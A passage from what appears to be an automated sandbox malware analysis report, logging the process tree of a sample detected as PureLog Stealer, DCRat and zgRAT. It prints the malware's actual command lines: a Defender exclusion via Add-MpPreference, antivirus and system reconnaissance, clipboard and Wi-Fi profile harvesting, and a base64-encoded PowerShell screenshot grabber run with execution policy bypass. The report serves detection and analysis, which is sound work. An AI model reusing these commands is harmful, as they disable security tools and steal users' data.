                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                  Imagebase:0x7ff70f330000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:21
                                                                  Start time:22:27:05
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:22
                                                                  Start time:22:27:05
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                  Imagebase:0x7ff6c0ae0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:23
                                                                  Start time:22:27:05
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                  Imagebase:0x7ff6c0ae0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:24
                                                                  Start time:22:27:05
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:25
                                                                  Start time:22:27:05
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:26
                                                                  Start time:22:27:07
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat" "
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:27
                                                                  Start time:22:27:07
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:28
                                                                  Start time:22:27:08
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:tasklist /FO LIST
                                                                  Imagebase:0x7ff72c810000
                                                                  File size:106'496 bytes
                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:29
                                                                  Start time:22:27:08
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:tasklist /FO LIST
                                                                  Imagebase:0x7ff72c810000
                                                                  File size:106'496 bytes
                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:30
                                                                  Start time:22:27:08
                                                                  Start date:31/07/2024
                                                                  Path:C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor/ChainComServermonitor.exe"
                                                                  Imagebase:0x4b0000
                                                                  File size:3'720'704 bytes
                                                                  MD5 hash:5FE249BBCC644C6F155D86E8B3CC1E12
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001E.00000000.1761622309.00000000004B2000.00000002.00000001.01000000.00000023.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001E.00000002.1949562045.00000000128C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe, Author: Joe Security
                                                                  Antivirus matches:
                                                                  • Detection: 92%, ReversingLabs
                                                                  Has exited:true

                                                                  Target ID:31
                                                                  Start time:22:27:09
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                  Imagebase:0x7ff6c0ae0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:32
                                                                  Start time:22:27:09
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:33
                                                                  Start time:22:27:09
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                  Imagebase:0x7ff6c0ae0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:34
                                                                  Start time:22:27:09
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                  Imagebase:0x7ff6c0ae0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:35
                                                                  Start time:22:27:09
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                                  Imagebase:0x7ff6c0ae0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:36
                                                                  Start time:22:27:09
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                  Imagebase:0x7ff6c0ae0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:37
                                                                  Start time:22:27:09
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:38
                                                                  Start time:22:27:09
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                                  Imagebase:0x7ff6c0ae0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:39
                                                                  Start time:22:27:09
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:40
                                                                  Start time:22:27:09
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:41
                                                                  Start time:22:27:09
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:42
                                                                  Start time:22:27:09
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:43
                                                                  Start time:22:27:11
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                  Imagebase:0x7ff699260000
                                                                  File size:576'000 bytes
                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:44
                                                                  Start time:22:27:11
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\systeminfo.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:systeminfo
                                                                  Imagebase:0x7ff6d9c90000
                                                                  File size:110'080 bytes
                                                                  MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:45
                                                                  Start time:22:27:12
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\tree.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:tree /A /F
                                                                  Imagebase:0x7ff691a50000
                                                                  File size:20'992 bytes
                                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:46
                                                                  Start time:22:27:12
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:powershell Get-Clipboard
                                                                  Imagebase:0x7ff788560000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:47
                                                                  Start time:22:27:12
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:tasklist /FO LIST
                                                                  Imagebase:0x7ff72c810000
                                                                  File size:106'496 bytes
                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:48
                                                                  Start time:22:27:12
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\netsh.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:netsh wlan show profile
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:96'768 bytes
                                                                  MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:51
                                                                  Start time:22:27:15
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                  Imagebase:0x7ff6c0ae0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:52
                                                                  Start time:22:27:16
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:55
                                                                  Start time:22:27:16
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\tree.com
                                                                  Wow64 process (32bit):false
                                                                  Commandline:tree /A /F
                                                                  Imagebase:0x7ff691a50000
                                                                  File size:20'992 bytes
                                                                  MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:57
                                                                  Start time:22:27:17
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline"
                                                                  Imagebase:0x7ff791cd0000
                                                                  File size:2'759'232 bytes
                                                                  MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:58
                                                                  Start time:22:27:17
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:59
                                                                  Start time:22:27:17
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                  Imagebase:0x7ff6c0ae0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:60
                                                                  Start time:22:27:17
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                  Imagebase:0x7ff6c0ae0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:61
                                                                  Start time:22:27:17
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:62
                                                                  Start time:22:27:17
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                  Imagebase:0x7ff6c0ae0000
                                                                  File size:289'792 bytes
                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:63
                                                                  Start time:22:27:17
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:64
                                                                  Start time:22:27:17
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6DA.tmp" "c:\Windows\System32\CSC43F2928123D49B6B141C06767811123.TMP"
                                                                  Imagebase:0x7ff6e6930000
                                                                  File size:52'744 bytes
                                                                  MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:65
                                                                  Start time:22:27:18
                                                                  Start date:31/07/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Target ID:66
